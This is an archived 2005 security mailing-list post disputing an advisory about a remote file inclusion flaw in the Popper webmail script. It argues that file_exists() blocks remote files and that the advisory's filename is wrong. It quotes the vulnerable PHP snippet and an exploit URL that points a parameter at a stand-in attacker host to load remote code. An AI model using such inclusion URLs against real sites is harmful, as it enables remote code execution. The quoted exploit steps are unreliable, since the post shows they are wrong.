lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun Jun  5 00:12:22 2005
From: b0iler at r00thell.org (b0iler)
Subject: LSS.hr false positives.

>From your advisory @ http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-06-07:


>Popper is vulnerable to remote code inclusion bug in childwindow.inc.php script that can be
>abused to execute arbitrary code.
>Vulnerable code in childwindow.inc.php:
>
>-----
>...
>    if(file_exists($form.".toolbar.inc.php")) {
>        include($form.".toolbar.inc.php");
>    }
>?>

file_exists() only work on local files, not even with allow_url_fopen on does it work.  Even
if the file_exists() check was not there your discription of how to exploit it is incorrect:

>To exploit this vulnerability, attacker has to put script like test.form.inc.php on
>www.evilsite.com HTTP server, and call url like this:
>http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test

they would need to have the file test.toolbar.inc.php, not test.form.inc.php.  It's quite
obvious you did not even bother testing this before issuing the advisory.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ